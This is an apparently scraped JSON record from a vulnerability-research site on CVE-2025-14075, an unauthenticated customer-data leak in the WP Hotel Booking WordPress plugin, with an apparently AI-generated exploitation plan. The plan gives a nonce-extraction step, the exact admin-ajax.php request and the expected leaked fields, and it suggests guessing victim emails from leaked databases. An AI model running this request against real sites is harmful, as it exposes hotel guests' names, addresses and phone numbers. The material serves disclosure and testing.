[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwwo9S4JxpzdMqXgcYBzhYp7nNH60NnNe1gDv27Jzd14":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2025-14075","wp-hotel-booking-unauthenticated-sensitive-information-exposure-via-email-parameter","WP Hotel Booking \u003C= 2.2.7 - Unauthenticated Sensitive Information Exposure via 'email' Parameter","The WP Hotel Booking plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.7. This is due to the plugin exposing the 'hotel_booking_fetch_customer_info' AJAX action to unauthenticated users without proper capability checks, relying only on a nonce for protection. 
This makes it possible for unauthenticated attackers to retrieve sensitive customer information including full names, addresses, phone numbers, and email addresses by providing a valid email address and a publicly accessible nonce.","wp-hotel-booking",null,"\u003C=2.2.7","2.2.8","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-01-16 14:00:37","2026-01-17 02:22:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1fc4eaec-b5d8-4707-9260-bac02a4b1866?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.asset.php","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.js","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.js.map","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.min.asset.php","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.min.js","assets\u002Fjs\u002Ffrontend\u002Fhotel-booking.js","includes\u002FTemplateHooks\u002FArchiveRoomTemplate.php","includes\u002Fclass-wphb-ajax.php","researched",false,3,"# Research Plan: CVE-2025-14075 - WP Hotel Booking Sensitive Information Exposure\n\n## 1. Vulnerability Summary\nThe **WP Hotel Booking** plugin (\u003C= 2.2.7) contains a sensitive information exposure vulnerability in its AJAX handling logic. The plugin registers the `hotel_booking_fetch_customer_info` action for both authenticated and unauthenticated users. This function retrieves and returns all post meta associated with a booking (`hb_booking` post type) matching a provided email address. Because the function relies solely on a publicly accessible nonce and lacks any capability or identity checks, an unauthenticated attacker can retrieve full names, addresses, phone numbers, and other sensitive details of any customer by knowing their email address.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `hotel_booking_fetch_customer_info`\n- **HTTP Method**: `POST`\n- **Parameters**:\n    - `action`: `hotel_booking_fetch_customer_info`\n    - `email`: The target customer's email address (e.g., `victim@example.com`).\n    - `nonce`: A valid WordPress nonce for the action `hb_booking_nonce_action`.\n- **Authentication**: Unauthenticated (`nopriv`).\n- **Preconditions**: A booking must already exist in the database for the targeted email address.\n\n## 3. Code Flow\n1. **Entry Point**: `includes\u002Fclass-wphb-ajax.php` registers the action:\n   ```php\n   \u002F\u002F line 47\n   'fetch_customer_info' => true,\n   \u002F\u002F lines 73-77\n   add_action( \"wp_ajax_hotel_booking_{$action}\", array( __CLASS__, $action ) );\n   if ( $priv ) {\n       add_action( \"wp_ajax_nopriv_hotel_booking_{$action}\", array( __CLASS__, $action ) );\n   }\n   ```\n2. **Nonce Verification**: `WPHB_Ajax::fetch_customer_info()` verifies the nonce:\n   ```php\n   \u002F\u002F line 215\n   if ( empty( hb_get_request( 'nonce', false ) )\n       || ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {\n       die();\n   }\n   ```\n3. **Data Retrieval**: The function searches for `hb_booking` posts where the meta key `_hb_customer_email` matches the provided `$email`:\n   ```php\n   \u002F\u002F lines 220-225\n   $args  = array(\n       'post_type'   => 'hb_booking',\n       'meta_key'    => '_hb_customer_email',\n       'meta_value'  => $email,\n       'post_status' => 'any',\n   );\n   ```\n4. 
**Information Exposure**: If a booking is found, it extracts *all* post meta for that booking and includes it in the JSON response:\n   ```php\n   \u002F\u002F lines 231-235\n   if ( $posts = get_posts( $args ) ) {\n       $customer       = $posts[0];\n       $customer->data = array();\n       $data           = get_post_meta( $customer->ID );\n       foreach ( $data as $k => $v ) {\n           $customer->data[ $k ] = $v[0];\n       }\n   }\n   ```\n   This includes sensitive keys such as `_hb_customer_first_name`, `_hb_customer_last_name`, `_hb_customer_address`, `_hb_customer_phone`, etc.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required to pass the `wp_verify_nonce` check. The plugin localizes this nonce into the `hotel_settings` JavaScript object.\n\n1. **Identify Trigger**: The scripts are typically enqueued on pages containing the checkout or search functionality.\n2. **Create Page**: Create a page containing the `[hb_checkout]` shortcode.\n   - Command: `wp post create --post_type=page --post_status=publish --post_title=\"Checkout\" --post_content=\"[hb_checkout]\"`\n3. **Navigate & Extract**:\n   - Use `browser_navigate` to go to the newly created Checkout page.\n   - Use `browser_eval` to extract the nonce from the localized object.\n   - **JS Object**: `hotel_settings`\n   - **Nonce Key**: `nonce`\n   - **Command**: `browser_eval(\"window.hotel_settings?.nonce\")`\n\n## 5. Exploitation Strategy\n1. **Obtain Nonce**: Follow the strategy in Section 4.\n2. **Send Exploit Request**: Use the `http_request` tool to send a POST request to `admin-ajax.php`.\n   - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body**: `action=hotel_booking_fetch_customer_info&email=victim@example.com&nonce=[EXTRACTED_NONCE]`\n3. 
**Analyze Response**: The response should be a JSON object containing the `ID` of the booking and a `data` object with all the victim's personal information.\n\n## 6. Test Data Setup\n1. **Create Victim Booking**:\n   - Create a post of type `hb_booking`.\n   - Command: `wp post create --post_type=hb_booking --post_status=publish --post_title=\"Booking for Victim\"` (Note the ID).\n2. **Add Sensitive Meta**:\n   - `_hb_customer_email`: `victim@example.com`\n   - `_hb_customer_first_name`: `John`\n   - `_hb_customer_last_name`: `Doe`\n   - `_hb_customer_address`: `123 Secret Lane, Privacy City`\n   - `_hb_customer_phone`: `555-0199`\n   - Commands:\n     - `wp post meta set [BOOKING_ID] _hb_customer_email victim@example.com`\n     - `wp post meta set [BOOKING_ID] _hb_customer_first_name John`\n     - `wp post meta set [BOOKING_ID] _hb_customer_last_name Doe`\n     - `wp post meta set [BOOKING_ID] _hb_customer_address \"123 Secret Lane, Privacy City\"`\n     - `wp post meta set [BOOKING_ID] _hb_customer_phone 555-0199`\n3. **Create Nonce Page**:\n   - Create a page with the `[hb_checkout]` shortcode as described in Section 4.\n\n## 7. Expected Results\n- The AJAX request should return an HTTP 200 OK.\n- The response body should be a JSON object resembling:\n  ```json\n  {\n    \"ID\": 123,\n    \"post_author\": \"1\",\n    \"post_date\": \"...\",\n    \"data\": {\n      \"_hb_customer_email\": \"victim@example.com\",\n      \"_hb_customer_first_name\": \"John\",\n      \"_hb_customer_last_name\": \"Doe\",\n      \"_hb_customer_address\": \"123 Secret Lane, Privacy City\",\n      \"_hb_customer_phone\": \"555-0199\",\n      \"...\": \"...\"\n    }\n  }\n  ```\n\n## 8. Verification Steps\n1. **Verify Response**: Ensure the fields in the JSON response match the meta data set during the \"Test Data Setup\" phase.\n2. **Database Check**: Run `wp post meta list [BOOKING_ID]` to confirm the data being returned is exactly what is stored in the database.\n\n## 9. 
Alternative Approaches\n- **Different Shortcode**: If `[hb_checkout]` doesn't load the script, try `[hb_archive_room]` or `[hb_search_results]`.\n- **Global Search**: If the email address is unknown, an attacker might guess common emails or use information from other leaked databases to perform targeted lookups.\n- **Nonce Source**: Check the \"Archive Room\" page if the checkout page is restricted; `ArchiveRoomTemplate.php` calls `check_room_availability`, which likely triggers frontend JS initialization.","gemini-3-flash-preview","2026-05-05 07:30:36","2026-05-05 07:30:55",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","2.2.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-hotel-booking\u002Ftags\u002F2.2.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-hotel-booking.2.2.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-hotel-booking\u002Ftags\u002F2.2.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-hotel-booking.2.2.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-hotel-booking\u002Ftags"]